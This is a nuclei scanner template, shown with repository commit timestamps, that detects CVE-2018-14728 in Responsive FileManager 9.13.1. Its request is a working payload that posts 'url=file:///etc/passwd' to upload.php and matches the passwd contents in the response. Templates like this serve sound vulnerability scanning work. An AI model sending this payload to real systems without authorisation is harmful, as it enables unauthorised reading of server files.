nuclei-templates/cves/2018/CVE-2018-14728.yaml

30 lines
785 B
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-14728
2020-04-08 12:34:50 +00:00
info:
name: Responsive filemanager 9.13.1 - SSRF/LFI
author: madrobot
severity: critical
tags: cve,cve2018,ssrf,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-14728
cwe-id: CWE-918
description: "upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter."
reference:
- http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html
- https://www.exploit-db.com/exploits/45103/
2020-04-08 12:34:50 +00:00
requests:
- method: POST
path:
- "{{BaseURL}}/filemanager/upload.php"
2020-05-25 07:49:06 +00:00
body: "fldr=&url=file:///etc/passwd"
2020-04-08 12:34:50 +00:00
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2020-04-08 12:34:50 +00:00
part: body